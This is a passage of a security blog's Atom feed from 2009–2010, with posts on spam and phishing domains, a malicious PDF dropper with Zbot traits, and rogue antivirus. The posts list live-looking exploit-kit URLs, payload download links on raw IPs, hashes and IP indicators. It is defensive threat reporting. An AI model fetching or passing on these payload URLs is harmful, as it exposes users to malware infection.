/&gt;smilescool.com&lt;br /&gt;smulders.be&lt;br /&gt;southsidemag.net&lt;br /&gt;spanish-owners-direct.com&lt;br /&gt;starbicpay.com&lt;br /&gt;stayaerusa.com&lt;br /&gt;stayaerusa.net&lt;br /&gt;strategic-investment.com&lt;br /&gt;swsdental.net&lt;br /&gt;swsdiamonds.net&lt;br /&gt;swsrotary.com&lt;br /&gt;swsrotary.net&lt;br /&gt;texasa1.com&lt;br /&gt;thairealm.com&lt;br /&gt;toolrepairservices.com&lt;br /&gt;turveys.com&lt;br /&gt;wg7.net&lt;br /&gt;wh6.net&lt;br /&gt;wheretoonow.net&lt;br /&gt;wind-academy.net&lt;br /&gt;www.croydoncar.com&lt;br /&gt;www.bersy.it&lt;br /&gt;xa2.net&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;65.98.67.74&lt;br /&gt;alkayagnik.co.in&lt;br /&gt;bondre.in&lt;br /&gt;&lt;br /&gt;217.195.204.242&lt;br /&gt;www.nicaea.com.tr&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;160.217.96.2&lt;br /&gt;home.pf.jcu.cz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;124.248.32.48&lt;br /&gt;oneinfintyx.eu&lt;br /&gt;&lt;br /&gt;208.109.138.73&lt;br /&gt;www.sgftv.com&lt;br /&gt;&lt;br /&gt;72.167.131.159&lt;br /&gt;www.mangeshraut.com&lt;br /&gt;&lt;br /&gt;207.210.80.250&lt;br /&gt;5-porn.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dead domains:&lt;br /&gt;&lt;br /&gt;www.fuckbook-CABALLERO.com&lt;br /&gt;www.omvouxylqe.com&lt;br /&gt;40cdc69e1ecb.yepawobat.cn&lt;br /&gt;341a20db.nihaguzac.cn&lt;br /&gt;31d.dupesezew.cn&lt;br /&gt;58bb1.hecovujal.cn&lt;br /&gt;2ea1ed64c.rebatezur.cn&lt;br /&gt;5f88.foledikin.cn&lt;br /&gt;c7344.wuvoqafaq.cn&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-3140888977125348389?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BMHiOkcFFrwhfgmZAb_QyFROXgw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/3140888977125348389/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=3140888977125348389" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3140888977125348389?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/3140888977125348389?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/irNBEOAyNIk/spam-10-jan-10.html" title="Spam ** 10-Jan-10" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/spam-10-jan-10.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkMFSHk7eyp7ImA9WxBXEEo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-6853070918272830519</id><published>2010-01-02T01:38:00.000-08:00</published><updated>2010-01-21T02:40:19.703-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-21T02:40:19.703-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Yahoo Invisible Accounts</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Sz8UybyP60I/AAAAAAAAA6o/xX97CUdMpeM/s1600-h/yahooinvisible1.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 243px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Sz8UybyP60I/AAAAAAAAA6o/xX97CUdMpeM/s320/yahooinvisible1.PNG" alt="" id="BLOGGER_PHOTO_ID_5422075333061897026" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Don't be fool to login to this kind or similar fake yahoo websites. Change the yahoo password immediately once you fall to this kind of trick campaign. :)&lt;br /&gt;&lt;br /&gt;www.4detector.info (97.74.144.151)&lt;br /&gt;&lt;br /&gt;Domains sharing the same IP address:&lt;br /&gt;&lt;br /&gt;skatesquad.com&lt;br /&gt;sunrise.redearthdesign.com&lt;br /&gt;texasbirds.org&lt;br /&gt;thehowlands.net&lt;br /&gt;therightopportunity.com&lt;br /&gt;thiellsfd.com&lt;br /&gt;vbsvirtualassist.com&lt;br /&gt;virginia-beach-attorney.com&lt;br /&gt;vita-land.com&lt;br /&gt;wearevictory.com&lt;br /&gt;webshire.net&lt;br /&gt;www.97bi.com&lt;br /&gt;www.allsesso.com&lt;br /&gt;www.baiduxbaidu.info&lt;br /&gt;www.bestelderlyproducts.com&lt;br /&gt;www.billiard-tours.com&lt;br /&gt;www.blogadmonkey.com&lt;br /&gt;www.bugattiescorts.com&lt;br /&gt;www.ccmcinemas.com&lt;br /&gt;www.couture-threads.com&lt;br /&gt;www.dirking.info&lt;br /&gt;www.ezejobs.com&lt;br /&gt;www.gogobest.com&lt;br /&gt;www.jack21.com&lt;br /&gt;www.lasierranightclub.com&lt;br /&gt;www.linkking.info&lt;br /&gt;www.lucianvision.com&lt;br /&gt;www.lunwencn.com&lt;br /&gt;www.miamiartcontest.com&lt;br /&gt;www.nofaultsports.com&lt;br /&gt;www.peaveycorp.com&lt;br /&gt;www.perfectpennystocks.com&lt;br /&gt;www.politekstil.net&lt;br /&gt;www.profsrch.com&lt;br /&gt;www.qvisits.com&lt;br /&gt;www.redearthdesign.com&lt;br /&gt;www.runningwiththehorseman.com&lt;br /&gt;www.sese2009.com&lt;br /&gt;www.shopassignments.info&lt;br /&gt;www.skatesquad.com&lt;br /&gt;www.unmeteredhostingreview.com&lt;br /&gt;www.vbsvirtualassist.com&lt;br /&gt;www.virginia-beach-attorney.com&lt;br /&gt;www.zetaplex.com&lt;br /&gt;zeeone.com&lt;br /&gt;zetaplex.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6853070918272830519?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yAyYIKhi-RlGvTilKKpYeUvfHuM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/6853070918272830519/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=6853070918272830519" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6853070918272830519?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/6853070918272830519?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/9yyjH78tfno/yahoo-invisible-accounts.html" title="Yahoo Invisible Accounts" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_N2xP0b-ECBo/Sz8UybyP60I/AAAAAAAAA6o/xX97CUdMpeM/s72-c/yahooinvisible1.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/yahoo-invisible-accounts.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cDRncyeyp7ImA9WxBREUo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-2836540679957007042</id><published>2009-12-29T07:25:00.001-08:00</published><updated>2009-12-30T05:17:57.993-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-30T05:17:57.993-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="zbot" /><category scheme="http://www.blogger.com/atom/ns#" term="Pdf exploit" /><title>Miekiesmoes named in malicious crafted PDF, with TrojanDropper:Win32/Microjoin.gen!B</title><content type="html">While searching some malicious footprint code from Google that showed as below. Lots of the malicious sites can be found from below codes.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/Szof99hsSWI/AAAAAAAAA6I/Rj26DbjBG9c/s1600-h/footprint.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 35px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/Szof99hsSWI/AAAAAAAAA6I/Rj26DbjBG9c/s320/footprint.PNG" alt="" id="BLOGGER_PHOTO_ID_5420680250842171746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;One of the malicious site is porn site "teensxtube.com", you will notices that following internet connections were established.&lt;br /&gt;&lt;br /&gt;http://teensxtube.com/&lt;br /&gt;http://teensxtube.com/wp.js&lt;br /&gt;http://teensxtube.com/extra/sheduler.php&lt;br /&gt;http://teensxtube.com/extra/count.php?gr=4&lt;br /&gt;http://teensxtube.com/extra/count.php?gr=88&lt;br /&gt;http://eccinput.com/rstat.htm&lt;br /&gt;http://teensxtube.com/1.jpg&lt;br /&gt;http://homesiteuk.com/index.php&lt;br /&gt;http://eccinput.com/r/cnt-gif1x1.php?e=1600.1200&amp;amp;d=32&amp;amp;r=http%3A//teensxtube.com/&amp;amp;p=http%3A//eccinput.com/rstat.htm&amp;amp;t=&lt;br /&gt;http://homesiteuk.com/x.x&lt;br /&gt;http://homesiteuk.com//load.php?spl=mdac  (&lt;a href="http://www.virustotal.com/analisis/6d8909bacb1f4c00daf8c6ade7dab66f4ba6101ef426ee60de08de7e2c8df6f5-1262084917"&gt;VT&lt;/a&gt; 5/41); &lt;a href="http://www.threatexpert.com/report.aspx?md5=f594701a967c5512b67ef30bb287a8a9"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;http://homesiteuk.com/index.php?spl=2&amp;amp;br=MSIE&amp;amp;vers=6.0&amp;amp;s=&lt;br /&gt;http://homesiteuk.com//pdf.php&lt;br /&gt;http://homesiteuk.com/index.php?spl=3&amp;amp;br=MSIE&amp;amp;vers=6.0&amp;amp;s=&lt;br /&gt;http://saloongins.net/nop/tds2.php&lt;br /&gt;http://autouploaders.net/mass/tds2.php&lt;br /&gt;http://settopworld.net/incallspa.php&lt;br /&gt;http://greatinstant.net/yourseekerz.php&lt;br /&gt;http://getgreatguide.in/s/exx.php&lt;br /&gt;http://promotds.com/in.cgi?16&lt;br /&gt;http://promotds.com/in.cgi?6&lt;br /&gt;http://trenublo.com/estplanete.php&lt;br /&gt;http://getgreatguide.in/search.php?qq=young%20tight%20ass&lt;br /&gt;http://teenbestmovie.com/pi.php&lt;br /&gt;http://getgreatguide.in/s/exx.php&lt;br /&gt;http://getgreatguide.in/search.php?qq=allure%20amateur%20paige&lt;br /&gt;http://getgreatguide.in/search.php?qq=lesbian%20teen%20site%20myspace%20com&lt;br /&gt;http://fuckthisteen.net/pi.php&lt;br /&gt;http://teenbestmovie.com/index2.php&lt;br /&gt;http://fuckthisteen.net/index2.php&lt;br /&gt;http://bestwebtop.net/estvirtuel.php&lt;br /&gt;http://getgreatguide.net/s/exx.php&lt;br /&gt;http://www.unseencontent.com/&lt;br /&gt;http://www.unseencontent.com/cgi-bin/atx/out.cgi?l=o&lt;br /&gt;http://213.174.143.196/v/cj.php?d=80&lt;br /&gt;http://topfuckmovies.net/&lt;br /&gt;http://greattaby.com/addlinkworld.php&lt;br /&gt;http://findyourlink.net/s/exx_new.php&lt;br /&gt;http://findyourlink.net/search.php?qq=free%20gay%20guy%20sex%20video&lt;br /&gt;http://fuckthisteen.net/out.php?t=3.0.2.178&amp;amp;url=http://www.campsnatch.com/hosted/index.php?ws/valik/teenybopperclub_mov500&amp;amp;s=2&lt;br /&gt;http://cafebarplaza.cn/mostextra.php&lt;br /&gt;http://tofindhomes.in/s/exx.php&lt;br /&gt;http://tofindhomes.in/se.php?qq=hardcore%20big%20dick%20sex&lt;br /&gt;http://settopworld.net/greattab.php&lt;br /&gt;http://themiddel.com/s/exx.php&lt;br /&gt;http://themiddel.com/search.php?qq=buy+soma+online&lt;br /&gt;http://greatinstant.net/therealabc.php&lt;br /&gt;http://themiddel.com/s/exx.php&lt;br /&gt;http://themiddel.com/search.php?qq=buy+lipitor&lt;br /&gt;http://trenublo.com/topext.php&lt;br /&gt;http://findyourlink.net/s/exx_new.php&lt;br /&gt;http://findyourlink.net/search.php?qq=cock%20first%20her%20massive&lt;br /&gt;http://navigateguide.com/s/exx_new.php&lt;br /&gt;http://navigateguide.com/search.php?qq=ebony%20free%20model%20pic%20woman&lt;br /&gt;http://adprotraffic.com/asm.js?id=22592&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://homesiteuk.com//pdf.php, below is the decoded stream that captured from malicious pdf.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SztRePcjyzI/AAAAAAAAA6Y/cWoiBvAM9sE/s1600-h/1stlayer.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 189px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SztRePcjyzI/AAAAAAAAA6Y/cWoiBvAM9sE/s320/1stlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5421016156454767410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Seem like there have another layer code that need to decode. Without no surprising, you will get the actual codes after replacing  "&lt;span style="font-weight: bold;"&gt;kru pop 32&lt;/span&gt;" with "&lt;span style="font-weight: bold;"&gt;%&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SztReVWHFiI/AAAAAAAAA6g/eLukTuSS37Q/s1600-h/newPlayer.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 189px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SztReVWHFiI/AAAAAAAAA6g/eLukTuSS37Q/s320/newPlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5421016158038332962" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Obviously, analyst will get Unicode after decode using method UCS. http://homesiteuk.com//load.php?spl=pdf_0day&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://www.threatexpert.com/report.aspx?md5=f594701a967c5512b67ef30bb287a8a9"&gt;ThreatExpert&lt;/a&gt;, this malware categorized as Trojan Dropper and have Zbot characteristic. It will stole personal information and financial information. Besides that, it also generates lots traffics out to other porn websites.&lt;br /&gt;&lt;br /&gt;Following generated connections:&lt;br /&gt;&lt;br /&gt;autouploaders.net&lt;br /&gt;saloongins.net&lt;br /&gt;settopworld.net&lt;br /&gt;greatinstant.net&lt;br /&gt;trenublo.com&lt;br /&gt;bestwebtop.net&lt;br /&gt;greattaby.com&lt;br /&gt;cafebarplaza.cn&lt;br /&gt;discoverany.cn&lt;br /&gt;d45648675.cn&lt;br /&gt;moretds.in&lt;br /&gt;&lt;br /&gt;From the malicious crafted pdf file, there have interesting that I noticed is about "&lt;span style="font-weight: bold;"&gt;/Author (Miekiemoes)&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;Miekiesmoes is Assistant Director of Research @ Malwarebytes according from &lt;cite&gt;&lt;b&gt;miekiemoes&lt;/b&gt;.blogspot.com&lt;/cite&gt;&lt;br /&gt;&lt;cite&gt;&lt;br /&gt;&lt;/cite&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/Szoo7HUeXcI/AAAAAAAAA6Q/rejkwUoHB5A/s1600-h/Miekiemoes.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 293px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/Szoo7HUeXcI/AAAAAAAAA6Q/rejkwUoHB5A/s320/Miekiemoes.PNG" alt="" id="BLOGGER_PHOTO_ID_5420690097536130498" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Seem like someone is joking with her!  :-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2836540679957007042?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VV1hia7_7ZQHIIeIbOnzug4rDQo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/2836540679957007042/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=2836540679957007042" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2836540679957007042?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2836540679957007042?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/O69ngdXf_rU/miekiesmoes-named-in-malicious-crafted.html" title="Miekiesmoes named in malicious crafted PDF, with TrojanDropper:Win32/Microjoin.gen!B" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_N2xP0b-ECBo/Szof99hsSWI/AAAAAAAAA6I/Rj26DbjBG9c/s72-c/footprint.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2009/12/miekiesmoes-named-in-malicious-crafted.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE8GRnw-fyp7ImA9WxBSFUU.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-9028895233528147122</id><published>2009-12-23T06:29:00.000-08:00</published><updated>2009-12-23T07:40:27.257-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-23T07:40:27.257-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="Web Security" /><category scheme="http://www.blogger.com/atom/ns#" term="Bogus" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>Security Tool Rouge Antivirus</title><content type="html">Visiting compromised website with vulnerable IE browser end with rogue anti-virus installed in my virtual systems.  As usual, rouge anti-virus will perform scanning on systems with alerting with fake messages, and end up users tricked to purchase rouge anti-virus  online.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzI3k0oGr-I/AAAAAAAAA6A/szz8-FfRVZs/s1600-h/hidecodes.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 167px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzI3k0oGr-I/AAAAAAAAA6A/szz8-FfRVZs/s320/hidecodes.PNG" alt="" id="BLOGGER_PHOTO_ID_5418454407421800418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Will redirecting to "sodanthu.com/in6.php"&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SzIp7jcuNBI/AAAAAAAAA5g/CDMmRlB6gxo/s1600-h/SecurityTool.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 239px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SzIp7jcuNBI/AAAAAAAAA5g/CDMmRlB6gxo/s320/SecurityTool.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439404784858130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8wdY29I/AAAAAAAAA5w/Ay0H-avZtLQ/s1600-h/alert2.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 270px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8wdY29I/AAAAAAAAA5w/Ay0H-avZtLQ/s320/alert2.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439425457183698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8a42JfI/AAAAAAAAA5o/pwV2Lxu91cQ/s1600-h/alert1.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 142px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SzIp8a42JfI/AAAAAAAAA5o/pwV2Lxu91cQ/s320/alert1.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439419666769394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzIp9UTEipI/AAAAAAAAA54/CiDDx_VoiXU/s1600-h/SecurityToolPur.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SzIp9UTEipI/AAAAAAAAA54/CiDDx_VoiXU/s320/SecurityToolPur.PNG" alt="" id="BLOGGER_PHOTO_ID_5418439435077585554" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Few domains and IP address used to download the payloads:&lt;br /&gt;sodanthu.com - 76.186.201.167&lt;br /&gt;domoktov.com - 122.115.63.19&lt;br /&gt;bodyscanfit.com - 95.143.192.197&lt;br /&gt;93.178.16.243&lt;br /&gt;67.8.103.165&lt;br /&gt;115.23.132.150&lt;br /&gt;72.189.62.203&lt;br /&gt;remotepaybill.com - 72.233.65.202&lt;br /&gt;58.180.228.103&lt;br /&gt;noloid.com - 82.38.177.107&lt;br /&gt;&lt;br /&gt;Basically there have two executable payload files downloaded with low that AV detection rate.&lt;br /&gt;- load.exe 11/40 (sha1:f1b4fc1e56c9e129e83f3139b54dc9b26c481769) &lt;a href="http://www.virustotal.com/analisis/a13bc73f217562be2cb7a59da93eeb668c96ce36ff9f5873dbd01b59f024%20%206862-1261559599"&gt;VT&lt;/a&gt; , &lt;a href="http://www.threatexpert.com/report.aspx?md5=f7596f6404837238c9bcd09a2dbaec1d"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;- 78_wcap.exe 16/40 (sha1:a142cb266ad6cd764501981f6bb194025b7c8cc8) 78_wcap.exe &lt;a href="http://www.virustotal.com/analisis/0b7999c0e10ec11e942d1e757a8d45285c2a5e9362831be92a5c0060f2fd%20%20f87c-1261559687"&gt;VT&lt;/a&gt;, &lt;a href="http://www.threatexpert.com/report.aspx?md5=ab585c87652c933f82bbaddfd52ea15d"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"load.exe" starting request to download another two payloads from following urls:&lt;br /&gt;- http://95.211.8.217/pr/pic/test_vorogpa_b.exe (Netherlands)&lt;br /&gt;- http://213.108.56.140/pr/pic/mode.exe (Russian Federation)&lt;br /&gt;&lt;br /&gt;- test_vorogpa_b.exe 8/41 (sha1:77e476b0f93241d7fd4c96a93b2aaf51c0b7283c) &lt;a href="http://www.virustotal.com/analisis/a644b510223b25837d6f512775ab279ad6b904c7e55ffe05c46115951b91%20%20bf85-1261566764"&gt;VT&lt;/a&gt;, &lt;a href="http://www.threatexpert.com/report.aspx?md5=3308fd479356a3d578728a270b44eeec"&gt;ThreatExpert &lt;/a&gt;&lt;br /&gt;- mode.exe 8/41 (sha1:bd53d7a738a4eb7b208441772312c0a980f6c9d5) &lt;a href="http://www.virustotal.com/analisis/0454cf200f24cb589dd7b2f995c695e2dcfaca546e1faa30e074ff546138%20%200d74-1261566864"&gt;VT&lt;/a&gt;, &lt;a href="http://www.threatexpert.com/report.aspx?md5=bf69df57b8b56a679c0b691ac208060b"&gt;ThreatExpert&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Other than that, following Host Names were requested from host database:&lt;br /&gt;&lt;br /&gt;93.178.16.243  Saudi Arabia&lt;br /&gt;99.172.145.27   United States&lt;br /&gt;70.136.99.45   United States&lt;br /&gt;58.180.228.103   Korea, Republic Of&lt;br /&gt;69.133.52.228   United States&lt;br /&gt;98.150.16.40   United States&lt;br /&gt;116.32.243.20   Korea, Republic Of&lt;br /&gt;121.133.154.145   Korea, Republic Of&lt;br /&gt;65.36.21.142   United States&lt;br /&gt;67.8.103.165   United States&lt;br /&gt;68.63.4.110   United States&lt;br /&gt;115.23.132.150   Korea, Republic Of&lt;br /&gt;211.212.234.198   Korea, Republic Of&lt;br /&gt;189.39.157.223   Brazil&lt;br /&gt;72.189.139.203   United States&lt;br /&gt;200.59.9.82   Argentina&lt;br /&gt;119.207.4.172   Korea, Republic Of&lt;br /&gt;115.136.188.114   Korea, Republic Of&lt;br /&gt;221.161.156.247   Korea, Republic Of&lt;br /&gt;72.189.62.203   United States&lt;br /&gt;152.1.90.107   United States&lt;br /&gt;86.104.133.94   Romania&lt;br /&gt;67.191.95.170      United States&lt;br /&gt;112.170.209.51      Korea, Republic Of&lt;br /&gt;189.41.94.209      Brazil&lt;br /&gt;221.145.69.122      Korea, Republic Of&lt;br /&gt;82.139.32.75      Poland&lt;br /&gt;210.96.149.10      Korea, Republic Of&lt;br /&gt;89.33.184.138      Romania&lt;br /&gt;114.42.119.236       Taiwan, Province Of China&lt;br /&gt;220.88.62.193      Korea, Republic Of&lt;br /&gt;112.164.231.195      Korea, Republic Of&lt;br /&gt;67.66.92.186      United States&lt;br /&gt;192.35.222.23      United States&lt;br /&gt;98.239.53.112      United States&lt;br /&gt;211.56.233.178      Korea, Republic Of&lt;br /&gt;98.204.223.239      United States&lt;br /&gt;92.100.238.0      Russian Federation&lt;br /&gt;162.105.113.88      China&lt;br /&gt;121.182.163.238      Korea, Republic Of&lt;br /&gt;200.79.216.225      Mexico&lt;br /&gt;98.225.215.185      United States&lt;br /&gt;67.160.46.239      United States&lt;br /&gt;89.110.12.115      Russian Federation&lt;br /&gt;98.224.160.221      United States&lt;br /&gt;97.85.189.53      United States&lt;br /&gt;76.237.5.121      United States&lt;br /&gt;58.168.116.29      Australia&lt;br /&gt;76.179.11.105      United States&lt;br /&gt;70.126.56.149      United States&lt;br /&gt;193.151.59.190      Ukraine&lt;br /&gt;200.7.166.145      Bolivia&lt;br /&gt;24.92.178.72      United States&lt;br /&gt;88.216.25.114      Lithuania&lt;br /&gt;99.232.235.89      Canada&lt;br /&gt;115.43.186.103      Taiwan, Province Of China&lt;br /&gt;118.42.212.181      Korea, Republic Of&lt;br /&gt;121.185.21.213      Korea, Republic Of&lt;br /&gt;121.174.84.123      Korea, Republic Of&lt;br /&gt;68.69.204.104       Canada&lt;br /&gt;61.58.111.158      Taiwan, Province Of China&lt;br /&gt;94.54.195.12      Turkey&lt;br /&gt;201.13.94.177      Brazil&lt;br /&gt;121.145.43.209      Korea, Republic Of&lt;br /&gt;188.97.120.80      Germany&lt;br /&gt;80.216.136.246      Sweden&lt;br /&gt;85.67.63.112      Hungary&lt;br /&gt;70.235.17.227      United States&lt;br 